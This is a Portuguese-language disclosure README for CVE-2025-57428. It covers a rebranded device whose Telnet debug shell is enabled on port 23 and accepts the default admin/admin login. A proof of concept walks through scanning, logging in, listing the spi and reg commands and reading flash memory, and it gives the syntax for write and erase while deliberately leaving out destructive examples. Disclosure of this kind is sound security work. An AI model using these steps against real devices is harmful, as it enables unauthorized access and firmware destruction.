
CVE-2025-57428
⚠️ Este repositório é mantido apenas como referência para CVE-2025-57428.
Para outros avisos e atualizações, consulte: security-advisories.
Este dispositivo expõe uma interface de depuração Telnet (ativada por padrão na porta 23) e aceita credenciais de administrador (`admin`/`admin` por padrão). Após a autenticação, o shell fornece acesso direto a comandos de baixo nível (notadamente `spi` e `reg`), o que pode levar à corrupção arbitrária do firmware, ao brick do dispositivo e à perda de funcionalidade ou configuração de segurança.
Nota: Eu omito intencionalmente comandos que realizam escritas destrutivas. A PoC abaixo confirma a existência e acessibilidade da interface sem fornecer um exploit pronto para uso.
Escaneie o dispositivo na rede local:
nmap -p 23 <device-ip>
Resultado: a porta 23 (telnet) mostra open.
Conecte-se via Telnet e autentique-se (credenciais padrão):
telnet <device-ip>
# Login as: admin
# Password: admin
Após o login, um prompt de depuração é apresentado CMD>.
Liste os comandos disponíveis:
CMD>help
A saída de ajuda mostra os seguintes menus:
cfg net os
Entre no menu os:
CMD>os
Liste os comandos disponíveis novamente:
OS>help
Desta vez, a saída de ajuda mostra os seguintes comandos:
thread mem spi reg cpuload cpubusy event
Usar spi mostra .
Observações:
As tentativas de encontrar qualquer contato de segurança ou canal de suporte do fabricante original não tiveram sucesso. O produto parece ser um dispositivo rebatizado de origem desconhecida.
Esta informação é fornecida apenas para fins educacionais e defensivos. O autor não se responsabiliza por qualquer uso indevido desta informação.
spi <rd/wr/er> <addr> [len]Leia a memória flash:
OS>spi rd 0x000fd0f0 16
Isso retorna um dump hexadecimal da região flash:
4f30650a 938f56fa 1b663a19 e316d824
Isso confirma que o comando funciona e o shell tem acesso de baixo nível.
O comando de escrita (spi wr) e o comando de apagar (spi er), bem como os comandos reg, também são executáveis.